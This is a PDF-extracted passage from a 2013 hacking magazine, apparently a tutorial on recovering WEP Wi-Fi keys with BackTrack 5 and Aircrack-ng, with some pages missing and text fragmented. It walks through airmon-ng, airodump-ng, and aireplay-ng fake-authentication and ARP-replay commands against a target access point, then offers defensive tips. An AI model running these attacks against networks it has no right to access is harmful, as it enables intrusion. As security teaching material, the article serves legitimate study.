8/10/2019 Hacking teaser 2013
1/13
March, 26th 2013
01/2013
1
8/10/2019 Hacking teaser 2013
2/13
8/10/2019 Hacking teaser 2013
3/13
8/10/2019 Hacking teaser 2013
4/13
Why BackTrack ?
BackTrack is a very specialized Linux distribution
(or abbreviated as distro) based on the Debian
GNU/Linux including a large collection and variety
of software applications and tools that are mainly
concerned with Penetration testing and digitalForensics. The current and most updated version
is BackTrack 5 Release 3 which we will be using
during all our upcoming examples and demos.
BackTrack now is the defacto standard for IT
Security Professionals working in the Penetration
testing field with a lot of resources and training
resources. Further information about BackTrack
and download links can be accessed at the official
BackTrack site http://www.backtrack-linux.org/
What is Aircrack-ng Suite?
Aircrack-ng (Next Generation) is a suite of
applications / tools including packet detector,
sniffer and WEP, WPA and WPA2 cracking tools, it
runs under both Linux and Windows however its
highly recommended to run under Linux not
because of the Aircrack issues with Windows butrather the limitations in Windows Operating itself
since its highly proprietary software with a lot of
restrictions especially with the network cards and
their respective drivers. For more information on
the tool, tutorials, downloads and supported
configurations please check the official site
http://www.aircrack-ng.org/
WEP threats
WEP or Wired Equivalent Privacy is one of the
first encryption algorithms used in Wireless to
encrypt data travelling in the air in Wireless LANs;
its also used as part of the shared authentication
mechanism to verify the wireless client device.
WEP uses an algorithm called RC4 known as
stream cipher (Given by RSA security) and
pseudo-random number generator (PRNG) andthe main problems with WEP or RC4 is:
The RC4 source code was posted in the
mid 90s and available on the internet for anyone
which gives the intruders and hackers the chance
to check the code and break it later.
There are many software packages
available in the market and most of them are free
tools that are used to crack the WEP.
RC4
RC4 is a very popular method of encryption and
its adopted by many applications. One of the
famous applications thats uses RC4 is SSL (secure
Socket Layer protocol) which most of the web
sites use to secure their data. RC4 cipher key
consists of two parts, Static and Dynamic part.
The Static part is the shared secret key that the
user enters in the Wireless device in order to
connect to the Network or gain access. Its
sometimes known as the pre-shared password.
The Length of this Key can be either 40 bit or 104
bit and it can be entered in either Hexadecimal
number or ASCII plain text value. If you are using
Hexadecimal then you will enter 10 characters for
the 40 bit key and 26 characters for the 104 key.
If you are using the ASCII then you will enter 5
characters for the 40 bit key and 13 characters for
the 104 key. The Dynamic part of the RC4 is the IV
(Initialization Vector). The Length of this part is 24
bit and it must be noted that this IV is always
changing and thats why its Dynamic. This IV is
appended (attached) to the shared secret key (40
bit or 104 bit) which gives us total of either 64 (40
+ 24) or 128 (104 + 24) bit encryption.
How WEP Works:RC4 works by using the XOR (Mathematical
function used with binary numbers, it gives
output of Zero for identical binaries and One
when the two input are different) with the cipher
key in order to encrypt data.
WEP Encryption Process:
1. The actual Data (un-encrypted plain text) sentfrom the sender station passes first by an
Integrity check algorithm which creates an
8/10/2019 Hacking teaser 2013
5/13
8/10/2019 Hacking teaser 2013
6/13
Tools and Devices Needed during
the Attack
1. Laptop or Computer with BackTrack 5 R3
loaded on it. It can be Virtual machine or physical
computer with good RAM and Processing power.
My test Laptop was Dual core processor and 8 GBRAM.
2. Wireless card able to inject traffic and packets.
I will be using the most popular and available
wireless card Alfa Networks AWUS036H utilizing
the Realtek 8187 driver supported by the Aircrack
suite, however there are other cards. Another
good one is Netgear WN111. For complete list
with supported cards and drivers under eitherWindows or Linux, please check the following site
http://www.aircrack-
ng.org/doku.php?id=compatible_cards
3. Access Point supporting WEP encryption (Most
of Access points / Routers will satisfy this need)
BackTrack Basics
Turn on the Monitoring Mode: The First Step to
capture and crack the WEP encryption key is to
turn the Wireless Network card into monitoring
mode (Similar to the Promiscuous mode in
Ethernet Networks). The Easiest way to do so is
to use the Airmon-ng Command. Running
airmon-ng without any parameters will display
the current wireless interfaces on your computer
or Laptop to check which one will be used in the
Packet sniffing and injection incase you have
several cards. In my case I had two interfaces
(The first network is the default Wireless card
built in the laptop) and I enabled the WLAN0
(which has the Realtek RTL8187) interface using
Airmon-ng start wlan0 as per attached.
8/10/2019 Hacking teaser 2013
7/13
March, 26th 2013
01/2013
7
To check if there is any process accessing the
Wireless card and may cause any future problems
you can run the airmon-ng check, if any process
is listed you can kill them using the command
airmon-ng check kill. The next step will be
checking and identifying the nearby networks,
sometimes you might get many Wireless
Networks in your coverage area and it would
ertainly be beneficial if you can start your
monitoring mode on the exact channel of the
Access Point that you are targeting. To get a list
of the nearby Access points / Networks you can
either get it using the BackTrack Graphical
Interface from Applications Internet WICD
Network Manager.
Another way would be
using the EGREP
functionality with the
IW DEV command as
shown below (This
command is case
sensitive and thespaces should be
preserved) iw dev
wlan0 scan | egrep
DS\ Parameter\
set|SSID
8/10/2019 Hacking teaser 2013
8/13
In my current test scenario the target Wireless Network using WEP was using Channel 11. So my network
card monitoring mode was commenced on Channel 11 to filter the surrounding Access Points.
WEP Key Recovery Step by Step
attack:
1. In my current test scenario the target Wireless
Network using WEP was using Channel 11 and I
fired my monitoring mode on Channel 11 to filter
out the surrounding Access Points using the
command airmon-ng start wlan0 11 as shown onthe picture above.
2. Start an Airodump Capture on the Given Access
Point Channel and BSSID. The output of this
Airodump will be saved on a Capture file on the
computer disk to be passed later to the Aircrack
tool to recover the Key. Airodump-ng is mainly
used for Capturing 802.11 frames and in our case
the WEP IVs. The Command used is as follows:
airodump-ng -c 11 --bssid xx:xx:xx:xx:xx:xx -w
testdemo mon0 Where C stands for the
Channel, BSSID is the MAC address of the
8/10/2019 Hacking teaser 2013
9/13
March, 26th 2013
01/2013
9
Target Access Point and W is followed by the name of the output capture file.
As you can see from the above image that by
pointing and targeting Channel 11, I was able to
filter the list of Access Points to only my target AP
(Ending with 87) and there is one station
currently connected (ending with A8:42) Make
sure to keep the Airodump-ng window running
till you finish step 3, 4 and 5 and gather the
needed IVs
3. We will run the first attack using Aireplay-ng
which is the fake authentication. The Fake
Authentication attack is used mainly when you
need to attack a WEP enabled access point and
there are no current clients associated to this
Network and you need to fake this network. Fake
Authentication allows you to use both WEP
authentication (Open and Shared), It should be
noted that its only used with WEP enabled
Wireless Networks and not WPA or WPA2. Its
recommended by all security professionals to
start always with the fake authentication attack.
The command used is:
aireplay-ng -1 0 -e AP-SSID -a xx:xx:xx:xx:xx:xx -h
yy:yy:yy:yy:yy:yy mon0
Where 1 stands for the Fake Authentication
attack which is the number 1 attack, 0 is the
timing in seconds for Re-association, e is for the
Wireless Network name that users connect towith their network cards, a is the Target Access
Point MAC address and h is followed by the
MAC address of my internal Realtek Wireless
card.
8/10/2019 Hacking teaser 2013
10/13
To confirm that my Fake Authentication was successful we will run the Airodump again (Ran earlier in Step
2) and we will find the new Workstation (Our Realtek Card ending with 07:b0) added to the list of
connected stations.
4. Run an ARP request Replay attack (ARP stands for Address Resolution Protocol and its TCP/IP protocol
used to convert an IP address into a physical address, such as an Ethernet address), this is one of the most
effective methods to generate new IVs. It listens for an ARP packet then retransmits it back to the access
point which will make the Access Point repeat the ARP packet with a new IV, this process should be done
over and over for some time till enough number of Initialization Vectors IVs are collected. aireplay-ng -3 -b
xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy mon0 Where 3 stands for the ARP request Replay attack which is the
number 3 attack in the suite, b is Target AP MAC address and h is your MAC address after successful
Fakeauthentication
attack and
association to
the Target
Access Point or
any already
associated
client MAC
address.
8/10/2019 Hacking teaser 2013
11/13
8/10/2019 Hacking teaser 2013
12/13
Thank you for reading our magazine from
cover to cover. Please share with us your
comment about this issue on Twitter or
Facebook:
@Hackinsight
http://www.facebook.com/hackinsi
ght
The techniques described in our articles may only be
used in private, local networks.The editors hold no
responsibility for misuse of the presented techniques
or consequent data loss.
Become our Beta
Tester and receive
each article before
the publicationdate!
About the author
only available security compared to nothing
however you need to take some extra
precautions. Check for the most updated
drivers from your Access Point
Manufactures, use a 128 bit encryption
key, change the key frequently and finally
install any free IDS system to monitor theconnections and if any malicious attacks is
launched against your system.
I will try to explore more advanced WEP
cracking techniques including data / packet
injection in further future articles and
explores the world of the famous secured
WPA and WPA2 and their weakness
(Remember there is no complete secure
system )
Ahmed Nabil
is an IT
professional with
more than 13 years of experience,
specialized in IT infrastructure, security,
system administration and IT management.
My real passion is Networking and Security.
I hold a BS, MS, MCITP, MCSE, CCNP, CWSP,
CEH, CHFI, ITIL and PMP. You can follow me
on my blog (http://itcalls.blogspot.com)
http://www.twitter.com/Hackinsighthttp://www.twitter.com/Hackinsighthttp://www.facebook.com/hackinsighthttp://www.facebook.com/hackinsighthttp://www.facebook.com/hackinsighthttp://www.facebook.com/hackinsighthttp://www.twitter.com/Hackinsighthttp://www.facebook.com/hackinsighthttp://www.facebook.com/hackinsighthttp://www.twitter.com/Hackinsight8/10/2019 Hacking teaser 2013
13/13
March, 26th 2013
01/2013
http://www.cyexdesign.com/http://www.cyexdesign.com/http://www.cyexdesign.com/http://www.cyexdesign.com/Top Related